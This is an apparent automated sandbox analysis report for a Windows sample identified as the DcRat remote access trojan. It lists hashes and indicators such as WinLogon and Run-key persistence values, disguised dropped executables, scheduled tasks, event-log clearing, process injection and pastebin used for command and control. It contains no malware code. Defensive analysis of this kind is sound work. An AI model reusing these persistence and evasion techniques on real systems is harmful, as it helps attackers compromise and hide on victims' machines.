Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3b9f8572fc7...40.exe
windows7-x64
10b9f8572fc7...40.exe
windows10-2004-x64
10b9f8572fc7...40.exe
android-9-x86
b9f8572fc7...40.exe
android-10-x64
b9f8572fc7...40.exe
android-11-x64
b9f8572fc7...40.exe
macos-10.15-amd64
b9f8572fc7...40.exe
ubuntu-18.04-amd64
b9f8572fc7...40.exe
debian-9-armhf
b9f8572fc7...40.exe
debian-9-mips
b9f8572fc7...40.exe
debian-9-mipsel
Analysis
-
max time kernel
900s -
max time network
901s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14/01/2025, 04:21
Static task
static1
Behavioral task
behavioral1
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
android-x86-arm-20240624-en
Behavioral task
behavioral4
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
android-x64-20240624-en
Behavioral task
behavioral5
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
android-x64-arm64-20240624-en
Behavioral task
behavioral6
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
macos-20241101-en
Behavioral task
behavioral7
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral8
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral9
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral10
Sample
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Resource
debian9-mipsel-20240611-en
General
-
Target
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
-
Size
65.7MB
-
MD5
c9f4668c97eb480751e1bbf6173fc4e1
-
SHA1
528deade2bc88cafc26f78f7c73490b66abdf370
-
SHA256
b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
-
SHA512
dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
-
SSDEEP
196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\", \"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\"" ServerComponenthostMonitorDll.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection = 22020100 svchost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 852 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2256 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1416 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1500 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2288 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3056 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2344 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2296 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1896 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1912 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1520 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 784 2432 schtasks.exe 37 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 956 2432 schtasks.exe 37 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 2576 created 1244 2576 twain_32.exe 21 PID 2576 created 1244 2576 twain_32.exe 21 PID 2576 created 1244 2576 twain_32.exe 21 PID 2576 created 1244 2576 twain_32.exe 21 PID 2576 created 1244 2576 twain_32.exe 21 PID 2576 created 1244 2576 twain_32.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 PID 1516 created 1244 1516 updater.exe 21 -
pid Process 2700 powershell.exe 1664 powershell.exe 1556 powershell.exe 1788 powershell.exe 1308 powershell.exe 2356 powershell.exe 1484 powershell.exe 1224 powershell.exe 1400 powershell.exe 1312 powershell.exe 1660 powershell.exe 860 powershell.exe 340 powershell.exe 2996 powershell.exe 768 powershell.exe 2412 powershell.exe 2840 powershell.exe 1108 powershell.exe 2476 powershell.exe 2472 powershell.exe 912 powershell.exe 916 powershell.exe 2200 powershell.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 12 IoCs
pid Process 2780 Astral private DLL.exe 2576 twain_32.exe 2644 ServerComponenthostMonitorDll.exe 1684 OSPPSVC.exe 1516 updater.exe 2812 OSPPSVC.exe 3032 dwm.exe 1416 Idle.exe 2040 ServerComponenthostMonitorDll.exe 2256 audiodg.exe 2340 cmd.exe 860 OSPPSVC.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 2580 cmd.exe 2580 cmd.exe 2716 taskeng.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\OSPPSVC.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\dwm.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Windows NT\\Accessories\\audiodg.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\All Users\\Microsoft Help\\Idle.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\cmd.exe\"" ServerComponenthostMonitorDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\"" ServerComponenthostMonitorDll.exe -
Drops desktop.ini file(s) 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BY17T927\desktop.ini DllHost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini DllHost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MT4W94IX\desktop.ini DllHost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T1DP8V76\desktop.ini DllHost.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UGWF8QWZ\desktop.ini DllHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 pastebin.com 10 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 860 powercfg.exe 2220 powercfg.exe 1936 cmd.exe 2000 powercfg.exe 2472 powercfg.exe 1660 powercfg.exe 1224 powercfg.exe 1028 cmd.exe 1744 powercfg.exe 1936 powercfg.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created \??\c:\Windows\System32\CSC9175271B41B14A2EA1B778189E3E6F6.TMP csc.exe File created \??\c:\Windows\System32\byyuy-.exe csc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2576 set thread context of 2348 2576 twain_32.exe 112 PID 1516 set thread context of 2964 1516 updater.exe 138 PID 1516 set thread context of 2972 1516 updater.exe 145 PID 1516 set thread context of 2360 1516 updater.exe 146 -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files\Windows NT\Accessories\audiodg.exe ServerComponenthostMonitorDll.exe File created C:\Program Files\Windows NT\Accessories\42af1c969fbb7b ServerComponenthostMonitorDll.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe ServerComponenthostMonitorDll.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\6cb0b6c459d5d3 ServerComponenthostMonitorDll.exe File created C:\Program Files\Google\Chrome\updater.exe twain_32.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1308 sc.exe 2396 sc.exe 600 sc.exe 1564 sc.exe 2312 sc.exe 1700 sc.exe 1520 sc.exe 1760 sc.exe 1740 sc.exe 588 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Astral private DLL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20ec5a323c66db01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs dialer.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2632 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1520 schtasks.exe 784 schtasks.exe 956 schtasks.exe 2224 schtasks.exe 1696 schtasks.exe 3056 schtasks.exe 2160 schtasks.exe 2264 schtasks.exe 2344 schtasks.exe 852 schtasks.exe 2256 schtasks.exe 2288 schtasks.exe 1912 schtasks.exe 1500 schtasks.exe 2060 schtasks.exe 2296 schtasks.exe 1896 schtasks.exe 2792 schtasks.exe 1416 schtasks.exe 2312 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe 2644 ServerComponenthostMonitorDll.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1684 OSPPSVC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2644 ServerComponenthostMonitorDll.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 340 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 1684 OSPPSVC.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 2348 dialer.exe Token: SeShutdownPrivilege 2000 powercfg.exe Token: SeAuditPrivilege 864 svchost.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeShutdownPrivilege 1660 powercfg.exe Token: SeShutdownPrivilege 2472 powercfg.exe Token: SeShutdownPrivilege 1224 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 864 svchost.exe Token: SeIncreaseQuotaPrivilege 864 svchost.exe Token: SeSecurityPrivilege 864 svchost.exe Token: SeTakeOwnershipPrivilege 864 svchost.exe Token: SeLoadDriverPrivilege 864 svchost.exe Token: SeSystemtimePrivilege 864 svchost.exe Token: SeBackupPrivilege 864 svchost.exe Token: SeRestorePrivilege 864 svchost.exe Token: SeShutdownPrivilege 864 svchost.exe Token: SeSystemEnvironmentPrivilege 864 svchost.exe Token: SeUndockPrivilege 864 svchost.exe Token: SeManageVolumePrivilege 864 svchost.exe Token: SeAssignPrimaryTokenPrivilege 864 svchost.exe Token: SeIncreaseQuotaPrivilege 864 svchost.exe Token: SeSecurityPrivilege 864 svchost.exe Token: SeTakeOwnershipPrivilege 864 svchost.exe Token: SeLoadDriverPrivilege 864 svchost.exe Token: SeSystemtimePrivilege 864 svchost.exe Token: SeBackupPrivilege 864 svchost.exe Token: SeRestorePrivilege 864 svchost.exe Token: SeShutdownPrivilege 864 svchost.exe Token: SeSystemEnvironmentPrivilege 864 svchost.exe Token: SeUndockPrivilege 864 svchost.exe Token: SeManageVolumePrivilege 864 svchost.exe Token: SeAssignPrimaryTokenPrivilege 864 svchost.exe Token: SeIncreaseQuotaPrivilege 864 svchost.exe Token: SeSecurityPrivilege 864 svchost.exe Token: SeTakeOwnershipPrivilege 864 svchost.exe Token: SeLoadDriverPrivilege 864 svchost.exe Token: SeSystemtimePrivilege 864 svchost.exe Token: SeBackupPrivilege 864 svchost.exe Token: SeRestorePrivilege 864 svchost.exe Token: SeShutdownPrivilege 864 svchost.exe Token: SeSystemEnvironmentPrivilege 864 svchost.exe Token: SeUndockPrivilege 864 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2712 wrote to memory of 2780 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 30 PID 2712 wrote to memory of 2780 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 30 PID 2712 wrote to memory of 2780 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 30 PID 2712 wrote to memory of 2780 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 30 PID 2712 wrote to memory of 2576 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 31 PID 2712 wrote to memory of 2576 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 31 PID 2712 wrote to memory of 2576 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 31 PID 2712 wrote to memory of 2576 2712 b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe 31 PID 2780 wrote to memory of 2824 2780 Astral private DLL.exe 32 PID 2780 wrote to memory of 2824 2780 Astral private DLL.exe 32 PID 2780 wrote to memory of 2824 2780 Astral private DLL.exe 32 PID 2780 wrote to memory of 2824 2780 Astral private DLL.exe 32 PID 2824 wrote to memory of 2580 2824 WScript.exe 33 PID 2824 wrote to memory of 2580 2824 WScript.exe 33 PID 2824 wrote to memory of 2580 2824 WScript.exe 33 PID 2824 wrote to memory of 2580 2824 WScript.exe 33 PID 2580 wrote to memory of 2632 2580 cmd.exe 35 PID 2580 wrote to memory of 2632 2580 cmd.exe 35 PID 2580 wrote to memory of 2632 2580 cmd.exe 35 PID 2580 wrote to memory of 2632 2580 cmd.exe 35 PID 2580 wrote to memory of 2644 2580 cmd.exe 36 PID 2580 wrote to memory of 2644 2580 cmd.exe 36 PID 2580 wrote to memory of 2644 2580 cmd.exe 36 PID 2580 wrote to memory of 2644 2580 cmd.exe 36 PID 2644 wrote to memory of 1332 2644 ServerComponenthostMonitorDll.exe 41 PID 2644 wrote to memory of 1332 2644 ServerComponenthostMonitorDll.exe 41 PID 2644 wrote to memory of 1332 2644 ServerComponenthostMonitorDll.exe 41 PID 1332 wrote to memory of 1944 1332 csc.exe 43 PID 1332 wrote to memory of 1944 1332 csc.exe 43 PID 1332 wrote to memory of 1944 1332 csc.exe 43 PID 2644 wrote to memory of 1484 2644 ServerComponenthostMonitorDll.exe 59 PID 2644 wrote to memory of 1484 2644 ServerComponenthostMonitorDll.exe 59 PID 2644 wrote to memory of 1484 2644 ServerComponenthostMonitorDll.exe 59 PID 2644 wrote to memory of 2996 2644 ServerComponenthostMonitorDll.exe 60 PID 2644 wrote to memory of 2996 2644 ServerComponenthostMonitorDll.exe 60 PID 2644 wrote to memory of 2996 2644 ServerComponenthostMonitorDll.exe 60 PID 2644 wrote to memory of 340 2644 ServerComponenthostMonitorDll.exe 62 PID 2644 wrote to memory of 340 2644 ServerComponenthostMonitorDll.exe 62 PID 2644 wrote to memory of 340 2644 ServerComponenthostMonitorDll.exe 62 PID 2644 wrote to memory of 768 2644 ServerComponenthostMonitorDll.exe 63 PID 2644 wrote to memory of 768 2644 ServerComponenthostMonitorDll.exe 63 PID 2644 wrote to memory of 768 2644 ServerComponenthostMonitorDll.exe 63 PID 2644 wrote to memory of 2356 2644 ServerComponenthostMonitorDll.exe 64 PID 2644 wrote to memory of 2356 2644 ServerComponenthostMonitorDll.exe 64 PID 2644 wrote to memory of 2356 2644 ServerComponenthostMonitorDll.exe 64 PID 2644 wrote to memory of 1224 2644 ServerComponenthostMonitorDll.exe 65 PID 2644 wrote to memory of 1224 2644 ServerComponenthostMonitorDll.exe 65 PID 2644 wrote to memory of 1224 2644 ServerComponenthostMonitorDll.exe 65 PID 2644 wrote to memory of 1556 2644 ServerComponenthostMonitorDll.exe 66 PID 2644 wrote to memory of 1556 2644 